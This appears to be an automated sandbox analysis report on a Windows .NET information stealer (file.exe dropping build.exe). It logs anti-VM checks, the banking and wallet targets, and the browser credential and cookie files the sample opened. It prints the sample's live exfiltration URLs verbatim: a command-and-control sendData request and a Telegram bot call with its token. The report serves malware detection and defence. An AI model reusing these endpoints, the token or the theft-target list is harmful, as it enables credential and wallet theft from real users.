Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595826s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -595609s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\build.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000000.1237262342.0000026B64C32000.00000002.00000001.01000000.00000006.sdmp, build.exe.0.dr	Binary or memory string: qemu'
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: build.exe, 00000002.00000002.2295304015.0000026B66887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: build.exe, 00000002.00000002.2301595940.0000026B76BAE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: build.exe.0.dr, vmG.cs	Reference to suspicious API methods: GetProcAddress(a4, rU)
Source: build.exe.0.dr, nf.cs	Reference to suspicious API methods: OpenProcess(1040u, bInheritHandle: false, aiGT.Id)
Source: build.exe.0.dr, nf.cs	Reference to suspicious API methods: ReadProcessMemory(intPtr, lpBuffer.BaseAddress, array, array.Length, out var lpNumberOfBytesRead)

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\build.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 6500, type: MEMORYSTR

Source: build.exe, 00000002.00000002.2295681999.0000026B66EB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Electrum\wallets
Source: build.exe, 00000002.00000002.2295681999.0000026B670AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: exodus.conf.json
Source: build.exe, 00000002.00000002.2295681999.0000026B66AC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $%AppData%\Jaxx\Local Storage\leveldb
Source: build.exe, 00000002.00000002.2295681999.0000026B66E98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Exodus
Source: build.exe, 00000002.00000002.2295681999.0000026B66ECB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Binance
Source: build.exe, 00000002.00000002.2295681999.0000026B66E78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Coinomi\Coinomi\wallets

Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
209.38.221.184	unknown	United States	7018	ATT-INTERNET4US	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
41.216.183.9	unknown	South Africa	40676	AS40676US	true

Name	Malicious	Reputation
http://41.216.183.9:8080/sendData?pk=MDhCREMyMTRGMDQ3ODIxQUI0NDJDRjRDQ0IzMEMxMUQ=&ta=U29mdHdhcmU=&un=ZnJvbnRkZXNr&pc=OTI3NTM3&co=VW5pdGVkIFN0YXRlcw==&wa=MA==&be=MA==	true	unknown
http://ip-api.com/line?fields=query,country	false	unknown
https://api.telegram.org/bot7722280561:AAEgRsAuRdqeD2qmEUjdhEM6F9R5eAxwIT4/sendMessage?chat_id=7734728653&text=%23Software%20%20%0A%0A%3Cb%3EOS%3A%3C%2Fb%3E%20%3Ci%3EMicrosoft%20Windows%20NT%206.2.9200.0%3C%2Fi%3E%0A%3Cb%3ECountry%3A%3C%2Fb%3E%20%3Ci%3EUnited%20States%3C%2Fi%3E%0A%3Cb%3EUsername%3A%3C%2Fb%3E%20%3Ci%3Euser%3C%2Fi%3E%0A%3Cb%3ECompname%3A%3C%2Fb%3E%20%3Ci%3E927537%3C%2Fi%3E%0A%0A%3Cb%3EReport%20size%3A%3C%2Fb%3E%200.12Mb%0A&reply_markup=%7B%22inline_keyboard%22%3A%5B%5B%7B%22text%22%3A%22Download%22%2C%22url%22%3A%22http%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%2C%7B%22text%22%3A%22Open%22%2C%22url%22%3A%22http%3A%2F%2F127.0.0.1%3A18772%2FhandleOpenWSR%3Fr%3Dhttp%3A%2F%2F209.38.221.184%3A8080%2Fget%2FI85OAzj7Op%2FyLWFd_user%40927537_report.wsr%22%7D%5D%5D%7D&parse_mode=HTML	false	unknown

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

ID:	1545189
Product:	CloudBasic
Start time:	08:10:08
Start date:	30.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	d5b8ac0d80c99e7dda0d9df17c159f3d
SHA1:	ae1e0aeb3fbba55999b74047ee2b8bb4e45f108a
SHA256:	c330322b774eb263b008178ff707e13b843fd7df62445cca3c52356509c26f78
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\4wlo1v434o\report.lock	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log	CSV text	1B713A2FD810C1C9A8F6F6BE36F406B1	0828576CB8B83C21F36AD29E327D845AB3574EBB	E51E809582894F4D484939BE3990DFC914E43F4AF72AE55A00B01FCFE348763B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log	CSV text	3A8957C6382192B71471BD14359D0B12	71B96C965B65A051E7E7D10F61BEBD8CCBB88587	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
C:\Users\user\AppData\Local\Temp\build.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	ECC94919C7D1385D489961B21AF97328	82F01AAC4FDEB34EC23900D73B64BEB01EA5A843	F47224FC9BD939839623AC7EB8F86D735D0DCD8BA7B2C256125850EFD6401059
\Device\Null	ASCII text, with CRLF line terminators, with overstriking	3DD7DD37C304E70A7316FE43B69F421F	A3754CFC33E9CA729444A95E95BCB53384CB51E4	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA